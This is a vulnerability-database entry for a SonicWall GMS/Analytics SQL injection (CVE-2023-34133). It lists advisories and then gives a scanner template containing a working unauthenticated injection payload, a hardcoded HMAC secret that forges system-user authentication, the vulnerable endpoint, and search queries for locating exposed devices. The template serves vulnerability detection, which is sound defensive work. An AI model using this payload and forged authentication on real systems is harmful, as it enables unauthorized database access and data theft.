| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
| CVE-2023-34127 | 13 Jul 202300:00 | – | attackerkb | |
| The vulnerability of the SonicWall Analytics analytical service and the SonicWall Global Management System (GMS) global network firewall management system lies in the lack of protection for the SQL query structure, which allows attackers to exploit the protected information. | 26 Jul 202300:00 | – | bdu_fstec | |
| CVE-2023-34133 | 13 Jul 202315:09 | – | circl | |
| SonicWALL Analytics和GMS SQL注入漏洞 | 13 Jul 202300:00 | – | cnnvd | |
| CVE-2023-34133 | 13 Jul 202302:28 | – | cve | |
| CVE-2023-34133 | 13 Jul 202302:28 | – | cvelist | |
| Sonicwall | 8 Sep 202319:52 | – | metasploit | |
| Vulnerabilities fixed in Sonicwall | 22 Aug 202300:00 | – | ncsc | |
| CVE-2023-34133 | 13 Jul 202303:15 | – | nvd | |
| CVE-2023-34133 | 13 Jul 202303:15 | – | osv |
id: CVE-2023-34133
info:
name: SonicWall GMS and Analytics - SQL Injection
author: theamanrawat
severity: high
description: |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in SonicWall GMS and Analytics allows an unauthenticated attacker to extract sensitive information from the application database. This issue affects GMS: 9.3.2-SP1 and earlier versions; Analytics: 2.5.0.4-R7 and earlier versions.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the target system.
remediation: |
Apply the latest security patches or updates provided by SonicWall to mitigate this vulnerability.
reference:
- https://raw.githubusercontent.com/rapid7/metasploit-framework/4b130f5be7590d04878f3bda37555e59e733324d/modules/exploits/multi/http/sonicwall_shell_injection_cve_2023_34124.rb
- https://www.sonicwall.com/support/product-notification/urgent-security-notice-sonicwall-gms-analytics-impacted-by-suite-of-vulnerabilities/230710150218060/
- https://github.com/getdrive/PoC/blob/main/2023/Sonicwall_Shell_Injection/sonicwall_shell_injection_cve_2023_34124.rb
- https://nvd.nist.gov/vuln/detail/CVE-2023-34133
- http://packetstormsecurity.com/files/174571/Sonicwall-GMS-9.9.9320-Remote-Code-Execution.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-34133
cwe-id: CWE-89
epss-score: 0.77027
epss-percentile: 0.99494
cpe: cpe:2.3:a:sonicwall:analytics:*:*:*:*:*:*:*:*
metadata:
max-request: 4
vendor: sonicwall
product: analytics
shodan-query: http.favicon.hash:"-1381126564"
fofa-query: icon_hash="-1381126564"
tags: cve2023,cve,sonicwall,sqli,injection,vkev,vuln
variables:
num: "999999999"
query: "' union select (select ID from SGMSDB.DOMAINS), '', '', '', '', '', (select MD5({{num}})),'', '', '"
secret: '?~!@#$%^^()'
auth: "{{hmac('sha1', query, secret)}}"
http:
- raw:
- |
GET /ws/msw/tenant/{{url_encode(query)}} HTTP/1.1
Host: {{Hostname}}
Auth: {"user": "system", "hash": "{{base64(hex_decode(auth))}}"}
matchers:
- type: word
part: body
words:
- '{{md5(num)}}'
# digest: 490a00463044022014cad534605b7087662781092b57dd44e8b28db402a0796479bc94c300b6f8df02202129367d04040e41372ee62fa020107fa967d4c886a8a303764c7316f7c40050:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation